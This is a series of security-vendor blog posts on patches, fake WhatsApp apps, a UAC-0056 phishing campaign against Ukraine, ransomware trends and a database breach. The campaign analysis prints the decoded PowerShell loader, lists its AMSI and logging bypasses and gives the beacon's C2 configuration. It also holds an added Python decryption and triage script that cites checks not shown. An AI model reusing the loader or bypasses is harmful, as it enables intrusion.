Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates.

Citrix released hotfixes to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.

Google released Android’s July security updates, including three vulnerabilities rated “Critical”.

SAP released its July 2022 Patch Day bulletin with 20 new Security Notes.

VMWare released security updates.

Stay safe, everyone!

The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.

WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info

WhatsApp boss Will Cathcart is warning users of the popular messaging app to be on their guard after the WhatsApp Security Team discovered bogus apps packing a hidden punch in the form of malware.

Outside the safety of the walled garden

App stores do whatever they can to try and prevent bogus programs making it onto the storefront. While the majority of apps on legitimate stores are likely safe, rogues do get through. To avoid the hassle of dodging safety checks, malware authors host their infected files elsewhere. If they can draw device owners outside the relative safety of a storefront, they have more scope for infecting a mobile.


There’s no detailed rundown of what the fake WhatsApp versions were getting up to on devices. What Cathcart does say is that these programs promised new features, but were specifically designed to steal personal information stored on victim’s phones.

Google Play Protect on Android now detects and disables previously installed copies of the fake WhatsApp apps, and because the fakes were distributed outside the Google Play store, the store itself is not affected.

This is great news for those inside the walled garden, but what about those sitting outside?

(Un)official store safety

The exact settings and menu names differ between Android versions and device models, but there is usually an option asking whether you want to download or install files from unknown sources.

What this means is “Do you want to install apps from outside the Google Play store”. This isn’t quite as nefarious as it sounds. Mobile networks and other organisations often offer downloadable software as part of their phone contracts. However, these app downloads may be offered outside of the Play Store. This is where the unknown source option comes into play.

A lot of the time, downloading these files outside of the store isn’t needed. The apps offered directly from organisations can be found on the Play Store anyway, in identical format. So it’s best to only download apps from the Play Store if at all possible.

WhatsApp: accept no imitations

WhatsApp recommends you only download the app from official stores. You can find links for both Android and iPhone on the official download page. WhatsApp has been known to hand users temporary bans if it finds evidence of people using unsupported versions on their devices. If you’re using a listed unsupported app, which is an altered version of the original, you’ll receive a temporary ban for that too.

It seems that the safest and most straightforward course of action is to avoid unofficial downloads, and follow WhatsApp’s advice for responsible app use.

The post WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info appeared first on Malwarebytes Labs.

Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

This blog was authored by Roberto Santos and Hossein Jazi

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted government entities in Ukraine via phishing campaigns that follow the same tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we connect the dots between the different decoy samples that we and others, such as CERT-UA, have observed. We also share indicators for a previously undocumented campaign carried out by the same threat actor at the end of June.

Different themes, same techniques

Since the publication of our blog post There’s a Go Elephant in the room, we have tracked several new samples as can be seen in the timeline below:

Figure 1: Relations between different UAC-0056 attributed samples

Let’s dig further into those relationships. CERT-UA has attributed the document named “Information on the availability of vacancies and their staffing.xls” to UAC-0056. This file looked familiar to us, and for good reason: its macro is nearly identical to the one in the document we analyzed in our initial blog:

Figure 2: Detail of Vacancies and GoElephant dropper macros

In the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we see an almost identical macro to the one used in another decoy document called Help Ukraine.xls:

Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros

The Help Ukraine lure, to our knowledge, has never been publicly documented before:

Figure 4: Help Ukraine lure used in late July

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Figure 5: Similarities between different versions

Also, in the past we have found macro comments referring to a domain named ExcelVBA[.]ru. This document was contacting a suspiciously similar domain named excel-vba[.]ru.

Figure 6: Similarities between different versions (2)

Among the targets, we find gov.ua email addresses. One of the texts used as the email body in the latest campaign was written in Ukrainian and translates to:

On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression. This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine!

Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are taken from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (Information on the availability of vacancies and their staffing.xls). The analysis remains valid for the others, although minor differences exist between samples.

write.bin

The document downloads an executable file named write.bin. Other attacks following the same scheme used different names for this file, including Office.exe, baseupd.exe and DataSource.exe. The file is slightly obfuscated and performs the following actions:

Establishing persistence

After some anti-debugging tricks, the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License is used to establish persistence. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker is checked first, because that was the value used by previous versions of the malware.

Figure 7: Run key for persistence

Dropping next stage

The next step is dropping a file at C:\ProgramData\TRYxaEbX. This file is used later.

Figure 8: Powershell commandline shown in IDA Pro

The payload then executes the following Base64-encoded PowerShell command:


Figure 9: Write executable creating the previous detailed powershell command

The command is Base64 encoded and decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short, the file dropped at C:\ProgramData\TRYxaEbX is decrypted with the RC4 algorithm using CmAJngvdDmiTjLxN as the key, and each line of the result is passed to iex. The resulting PowerShell script looks like this:

Figure 10: Decoded PowerShell stage

Here we can see some of the actions that will be taken:

  • Disable script logging
  • Disable Module Logging
  • Disable Transcription
  • Disable AMSI protection
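To recover and triage that dropped stage offline, here is a Python re-implementation of the RC4 routine from the PowerShell block above, followed by a simple check for the four logging and AMSI bypass actions just listed. This is an added example, not code from the campaign or from Malwarebytes; the key is the one named in the post, and the encrypted blob it works on is constructed here rather than being the real TRYxaEbX file.

```python
from typing import List

# Key named in the post; the sample ciphertext further down is constructed,
# not the real C:\ProgramData\TRYxaEbX contents.
KEY = b"CmAJngvdDmiTjLxN"

# Windows policy key names and AMSI symbols whose presence in a decoded stage
# corresponds to the four actions listed above (script block logging, module
# logging, transcription, AMSI). Assumed marker set for triage, not from the post.
BYPASS_MARKERS = (
    "ScriptBlockLogging",
    "ModuleLogging",
    "Transcription",
    "AmsiUtils",
    "amsiInitFailed",
)


def rc4_ksa(key: bytes) -> List[int]:
    """Key scheduling: the 0..255 loop in the PowerShell block ($X, $Z)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s


def rc4(key: bytes, data: bytes) -> bytes:
    """Keystream generation and XOR: the $W|%{...} pipeline ($U, $V).
    RC4 is symmetric, so the same call both encrypts and decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decode_stage(blob: bytes, key: bytes = KEY) -> List[str]:
    """Mirror the loader's post-processing (UTF-8 decode, split on newlines)
    but return the lines for inspection instead of handing them to iex."""
    text = rc4(key, blob).decode("utf-8")
    return [line for line in text.splitlines() if line.strip()]


def triage_stage(lines: List[str]) -> List[str]:
    """Return the bypass markers that occur anywhere in the decoded stage."""
    joined = "\n".join(lines)
    return [m for m in BYPASS_MARKERS if m in joined]


# Constructed stand-in for a decrypted second stage: one line that touches the
# script block logging policy key, one harmless line. Not the real payload.
SAMPLE_STAGE = (
    "$policy = 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging'\r\n"
    "Write-Output 'constructed stage two'\r\n"
)
# What the corresponding on-disk blob would look like after RC4 with KEY.
SAMPLE_BLOB = rc4(KEY, SAMPLE_STAGE.encode("utf-8"))


if __name__ == "__main__":
    recovered = decode_stage(SAMPLE_BLOB)
    for line in recovered:
        print(line)
    print("bypass markers:", triage_stage(recovered))
```

On a real case, pass the bytes of the recovered TRYxaEbX file to decode_stage() instead of SAMPLE_BLOB; the RC4 test vectors in the accompanying checks confirm the routine matches standard RC4.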

After this step, another Base64 payload is decoded and executed:

Figure 11: Final PowerShell script

Cobalt Strike payload deployed

As can be seen, the main functionality of this second PowerShell script is to inject shellcode. The shellcode can be 32- or 64-bit, and is a Cobalt Strike beacon with the following configuration:

BeaconType – HTTPS
Port – 443
SleepTime – 30000
PublicKey_MD5 – defb5d95ce99e1ebbf421a1a38d9cb64
C2Server – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/
UserAgent – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap
HttpPostUri – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/
Watermark – 1580103824

With a Cobalt Strike beacon running on the victim’s machine, the host is now fully compromised.

Attacker probes the sandbox

At the time of writing, the malicious C&C servers appear to be down. However, on July 5 we observed active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the contents of several folders.

We were able to decode the network communications using Didier Stevens’ excellent collection of Cobalt Strike tools.

Figure 12: Cobalt Strike communication decoded

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

Attribution to UAC-0056

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64) may be used to connect the attack to other groups. For instance, the public key should be unique per deployment, according to the Cobalt Strike documentation.

However, it is important to note that in this case we cannot simply rely on the public key to attribute the sample analyzed in this report. In fact, these signatures have already been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and therefore shares the same private key with others, which makes attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.


IOCs

Malicious Excel documents (Help Ukraine template)


Malicious Excel documents (Humanitarian template)


Payloads


Cobalt Strike beacon and payloads


The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

Ransomware rolled through business defenses in Q2 2022

Ransomware has given security professionals a headache for the better part of a decade. Fast forward to 2022, and the headache has become a migraine—not just for IT teams but business owners, employees, and customers as well. Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion.

The supply chain, already stretched to a breaking point, suffered additional misfortunes across multiple industries, from agriculture and manufacturing to technology and utilities. Governments, nonprofits, and schools—some forced to close their doors—didn’t escape unscathed. And the carnage was not confined to US borders, though it was by far the most affected country. Germany, the UK, and Italy also registered high ransomware tallies.

To understand how we got here, let’s first take a closer look at recent statistics on the top ransomware variants, countries and industries attacked. Next, we’ll evaluate noteworthy attacks month-by-month before discussing whether it’s worth paying the ransom in today’s climate. In addition, we’ll examine current trends to deduce what businesses might expect from ransomware authors in the months to come. Finally, we’ll review mitigation tactics that businesses of all sizes can adopt to keep ransomware at bay.

Top ransomware variants

LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place. However, the Conti gang suffered severe setbacks in the wake of its public declaration of support for Russia and subsequent data leaks of its source code, and the group quietly dismantled operations while keeping up appearances. Three groups alleged to be linked to Conti’s disbandment—Black Basta, ALPHV, and Hive—eventually overtook Conti in ransomware distribution by the end of May.

Here’s how the top variants ranked by total number of spring incidents:

  1. LockBit: 263
  2. Conti: 127
  3. Black Cat/ALPHV: 68
  4. Hive: 40
  5. Black Basta: 33*

*Black Basta launched in April, so its tally is one month less than the others.

Top countries

The United States was by far the most attacked country this spring, with 290 reported ransomware events. Its cyberattack count far surpassed the next two highest countries (Germany and the UK) combined, with the former reporting 48 ransomware incidents and the latter 41.

Here are the top five countries impacted by ransomware this spring:

  1. United States: 290
  2. Germany: 48
  3. UK: 41
  4. Italy: 38
  5. Canada: 31

Top industries

It might be easier to list the industries that weren’t impacted by ransomware in Q2. Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture.

In fact, the FBI warned the food and agriculture sector (specifically farmers’ co-ops) this April about potential ransomware attacks during critical planting and harvesting seasons that could result in operational disruptions to the supply chain, which could then lead to food shortages. The previous month, HP Hood Dairy suffered a ransomware attack, which was likely behind its Lactaid brand going missing from shelves in early April.

Here’s how the top five industries ranked by number of ransomware attacks this spring:

  1. Services: 171
  2. Manufacturing: 76
  3. Technology: 65
  4. Utilities: 61
  5. Retail: 50

Noteworthy March attacks

March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised. Lapsus$, the criminal enterprise behind Samsung’s infiltration, leaked 190 GB of data and source code reportedly from the Galaxy smartphone, as well as confidential information from Qualcomm.

The most active ransomware variant was LockBit, which registered 97 attacks in March alone, including a hit on tire company Bridgestone Americas that caused the organization to disconnect many of its Latin and North American manufacturing and retreading facilities from the corporate network.

Hive ransomware, a RaaS launched in June 2021, was also busy in March. The group attacked Romania’s petroleum provider, demanding a multi-million dollar ransom and forcing the company to shut down its websites and Fill&Go services at gas stations. Hive also compromised a California healthcare nonprofit later in the month.

Noteworthy April attacks

April stood out as the month when three new dangerous RaaS variants, thought to be Conti-affiliated, were introduced: Onyx, Mindware, and Black Basta. Conti still had some bite left, however, with 43 reported attacks that month. Among them were industrial giant Parker Hannifin and American automotive tools manufacturer Snap-on, as well as Panasonic’s Canadian operations, from which Conti claimed to have stolen 2.8 GB of data.

Newcomer Black Basta, who carried out 11 attacks in April, made headlines when it compromised German wind turbine company Deutsche Windtechnik and the American Dental Association, which was forced to take affected systems offline. The organization suffered disruptions to online services, telephones, email, and webchat, as well as personal data leaked on its members.

Onyx ransomware, meanwhile, launched with only six attacks in April, but they were deadly. The malware doesn’t just lock up systems and data—it destroys any file larger than 2 MB. Mindware also made a splashy April debut with double extortion threats and 13 attacks, including a Minnesota-based mental health provider from which it pilfered sensitive patient information.

The award for most data stolen in April goes to the Stormous criminal gang, who bragged about an assault resulting in 161 GB exfiltrated from Coca-Cola without the company knowing. Reports say the Russian-linked threat actors later put it up for sale for 16 million Bitcoin or $640,000.

To add insult to injury, REvil (aka Sodinokibi) appeared to return in April with new payloads and a fresh leak blog featuring a mixture of recent and old victims. The threat actors have been linked to numerous high-profile ransomware incidents, including arguably the biggest ransomware attack of all time—a supply-chain hit on Kaseya in July 2021 believed to have affected over 1,000 businesses.

Noteworthy May attacks

In May, government and education were some of the hardest hit verticals, while attacks on Indian airline SpiceJet and farming equipment maker AGCO made the most headlines globally. Black Basta was reportedly behind the AGCO infiltration, which disrupted production of harvesters, tractors, and other business operations. The Austrian state of Carinthia also made the news when the BlackCat gang disrupted its systems and demanded a ransom of $5 million.

Despite strong evidence of a slow-down in activity—just 12 reported incidents in May—Conti made a showy display with a massive, sustained attack against Costa Rica that resulted in its new president declaring a state of emergency on May 8. On the same day, an inflammatory message appeared on the group’s leak site alongside 672 GB of stolen data. In response, the US Department of State offered a $10 million reward for information leading to individuals holding key leadership positions within Conti.

In other May government attacks, the town of Quincy, Massachusetts, had its information service systems compromised. The town paid $500,000 for a decryption key and an additional $150,000 for security consultants to assist with the investigation. A ransomware attack in New Jersey’s Somerset County disrupted services and forced employees to shut down computers and create temporary Gmail accounts to ensure the public could still email key departments. The attack marked the 22nd US state or local government to be hit by ransomware in 2022, according to analysts at Recorded Future.

In education, several colleges and K–12 districts were crippled by ransomware. Kellogg Community College in Michigan was forced to cancel classes and close campuses due to a ransomware attack. On May 13, Lincoln College in Illinois permanently closed its doors after 157 years due to the combined effects of the pandemic and a major ransomware incident—a first in ransomware history.

Not to be outdone, LockBit set a steady pace in May with 73 attacks. Thought to have strong ties with Russia, the cybercriminals compromised the Bulgarian Refugee Agency and threatened to release sensitive files. Nearly 230,000 Ukrainian refugees have entered Bulgaria since the start of the war. LockBit was also behind May strikes against electronics manufacturer Foxconn, the Rio de Janeiro finance department, and one of the largest library services in Germany.

New ransomware trends

In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques. As a combined result of the increase in big game hunting (BGH) and remote/hybrid work, threat actors have been encountering ever more complex security infrastructures and a wider variety of devices and platforms.

To penetrate and encrypt as many systems as possible, some threat groups have started writing ransomware code using cross-platform programming languages like Python, Rust, or Golang. This allows the malware to run on different combinations of operating systems and architectures. Both BlackCat and Conti affiliates have been observed distributing versions of their variants for Linux as well as Windows. Developing in a cross-platform language also makes analyzing the malware more difficult for security researchers.

In attack methods, ransomware authors—while still favoring good old-fashioned social engineering—have started backing away from phishing emails and leaning toward exploiting server, software, and operating system vulnerabilities instead. In fact, unpatched vulnerabilities are now the primary vector for ransomware attacks, according to a report by IT software company Ivanti.

Last year, Ivanti identified 65 new vulnerabilities known to have been exploited in ransomware attacks—a number representing nearly one quarter of all vulnerabilities used to drop the threat in the history of its existence. There were 39 percent more vulnerabilities used for ransomware attacks in 2021 than in the previous year, and 2022 is shaping up to be even more tumultuous. From January to May 2022, 22 new vulnerabilities associated with ransomware were found, and all but one are considered critical or high-risk.

What do these trends mean for the year ahead? Cross-platform ransomware has the potential to infect even more systems, some (like Linux) that lack robust anti-ransomware protections. Coding ransomware in this way could eventually take down all endpoints, including IoT and personal devices, in a single blow, rendering recovery operations incredibly difficult—if not outright impossible. Automatic data backups to offsite and/or segmented servers will be key in keeping businesses operational in case of breach.

Meanwhile, ransomware operators are moving to swiftly weaponize vulnerabilities. The average time to exploit is now within eight days of the vulnerability being published by a vendor. That means organizations will need to prioritize patching vulnerabilities associated with ransomware, as well as according to criticality and against their own risk appetites.

To pay or not to pay

As ransomware attacks have evolved in sophistication and impact, so too have their ransom demands. Ransoms were 36 percent higher in 2021 than in 2020 at an average of $6.1 million. Yet by spring of 2022, many ransomware authors had whittled away at any sense of trust businesses might have had that by paying the ransom, they’ll receive what’s promised.

In 2020, gangs such as Conti, REvil, and Maze published stolen data even if the ransom was paid. Others took the ransom and never returned the files. By 2021, only 8 percent of those who paid the ransom actually got their files back. At that point, 83 percent of successful attacks featured double or triple extortion schemes. According to a Proofpoint study, 60 percent of participants who opted to negotiate with their attackers ended up having to pay ransom more than once.

By spring 2022, ransomware gangs showed no sense of responsibility toward their victims. RaaS operations, which now dominate the ransomware landscape, tend to be short-lived (therefore reputation isn’t important), and renegade affiliates often fail to follow their operator’s directions. When ransom demands bust the budget, data is not returned or is leaked regardless, and paying up puts a target on your back, it’s probably best to pocket the millions and get to work on mitigations.

Ransomware mitigations

To stave off potential future attacks—especially in an era of political and economic instability—the following actions are recommended:

  • Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Make sure these copies are not accessible for modification or deletion from any system where the original data lives.
  • Segment your network so that machines are not all reachable from every other machine.
  • Install updates/patches to operating systems, software and firmware as soon as they are released.
  • Install and regularly update endpoint security software on all devices—including those used in work-from-home capacities—and enable real-time detection.
  • Audit user accounts with administrative privileges and configure access controls with the least privilege in mind. Implement multifactor authentication (MFA) for additional credential security.
  • Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor for any unusual activity.

For ransomware reviews by the Malwarebytes Threat Intel team, check out the following:

  • March ransomware review
  • April ransomware review
  • May ransomware review
  • June ransomware review


The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.

Insecure password leads to Mangatoon data breach

The hugely popular Manga comics platform Mangatoon has fallen victim to a data breach. No fewer than 23 million user accounts could be at risk, thanks to a poorly secured database. Worse still, Mangatoon doesn’t seem to be responding to messages from the breacher, or people notifying it that the breach has taken place.

A limited edition run of exposed accounts

Mangatoon allows comics fans to read a variety of web comics for free via the app, with the option to “unlock” whole comics for a fee. Unfortunately for Mangatoon, its Elasticsearch database was compromised, leading to several attempts to get its attention.

No response was forthcoming by email or even social media. While it’s possible everyone involved is too busy fixing the problem, the complete lack of a reply is concerning.

Checking for exposure

The data from the breach, which occurred in May, has been loaded into the popular breach checking service Have I Been Pwned.

You can search for your email address on that site, and if your mail is tied to any data breaches (not just Mangatoon), the site will let you know which sites, what data, and when it was breached.

Password disasters of our time

The 23 million or so accounts have been exposed purely because of bad password management. All of this data was, incredibly, sitting behind the password “password”.

Mangatoon changed the password after the system breacher notified it. However, no customers have been notified, and anyone unaware would assume it is business as usual. Nothing could be further from the truth. Are there other, similarly poorly secured databases? Has the password been changed to something that isn’t “password123”?

Elasticsearch offers a variety of security features for all manner of configurations, so will Mangatoon be making use of them in future?

So many unanswered questions in a situation such as this aren’t massively reassuring.

Lock down your databases

Poorly secured Elasticsearch databases are juicy targets for those up to no good. At least 450 ransom notes were discovered demanding payment in return for files found on Elasticsearch databases back in June of this year. Sadly for anyone paying up to recover the stolen files, there’s a good chance the attackers had already deleted them. This is, of course, a valuable reminder to back up your data.

This is especially true considering Elasticsearch sits alongside Redis and MongoDB among 2022’s most commonly exposed databases.

If you use Mangatoon, you should change your account password now. If you’ve used the same username and password combination on other accounts, you should change those too.

The post Insecure password leads to Mangatoon data breach appeared first on Malwarebytes Labs.